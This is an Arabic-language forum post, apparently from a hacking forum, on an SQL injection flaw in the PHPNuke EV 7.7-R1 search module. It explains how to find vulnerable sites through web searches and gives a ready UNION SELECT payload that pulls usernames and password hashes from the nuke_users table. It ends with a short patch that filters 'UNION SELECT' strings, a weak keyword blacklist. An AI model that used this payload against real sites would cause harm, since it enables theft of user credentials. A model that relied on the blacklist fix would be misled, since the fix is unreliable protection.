نقاط : 0
تاريخ التسجيل : 01/01/1970
 |  موضوع: ثغره PHPNuke EV 7.7 -R1  30/10/2011, 10:52 pm | |
| السلامو عليكم
الشرح
1 [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
2 في خانه البحث دخل : PHPNuke EV 7.7 -R1
3 النتائج
4 : تخير الوصلات
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
يعني تحط الموقع وبعديه modules.php?name=Search
وبعدين لو الموقع مصاااب هتلاق بيقول دخل الكلام الي عايز تبحث عنه
فدخل الجمله ديه
كود HTML:
كود PHP:
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
هيطلعلك كل الهاشات
طريقه قفل الثغره كمان معايا
افتح الملف modules/Search/index.php
وبعد الكود ده
require_once("mainfile.php");
كود:
كود PHP:
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
ضيف الكمله ديه
كود:
كود PHP:
if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
die();
}
| |
|
